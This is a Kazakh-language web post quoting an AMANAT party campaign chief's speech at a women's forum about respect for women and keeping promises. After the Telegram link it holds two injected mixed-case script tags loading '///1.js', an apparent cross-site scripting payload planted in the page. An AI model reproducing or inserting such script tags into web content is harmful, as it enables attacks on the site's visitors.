✍️ Республикалық сайлауалды штабтың басшысы Ерлан Қошановтың «AMANAT» партиясының Республикалық әйелдер форумында сөйлеген сөзінен: «Құрметті Форумға қатысушылар! Өздеріңізбен осындай маңызды басқосуда – республикалық әйелдер форумында жүздесіп отырмыз. Әрине, осындай кілең әдемі, ақылды нәзік жандылардың алдында сөз сөйлеу оңай емес. Бірақ, мен енді оған үйренгенмін. Себебі, жолдасым мен екі қызым, кішкентай немерем бар. Сол ханымдардың ортасында жүргендіктен, әйел затының мұң-мұқтажын жақсы білемін. Жалпы, әйел заты аса талапшыл, ұқыпты ғой. Әрі ешнәрсені ұмытпайды. Сондықтан, олардың алдында өте жауапты сөйлеп, ер-азаматтарымыз берген уәделерін міндетті түрде орындау керек. Жеке өз басым да, «AMANAT» партиясы да мұны жақсы түсінеміз. Шын мәнінде, халқымыз әуел бастан аналарымызға, жары мен қарындас-қыздарына зор құрметпен, сыйластықпен қараған». t.me/AMANATPartiyasy<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.02.2023

Просмотров: 329


Пікір қосу



Деректерді қолтаңбаға қосу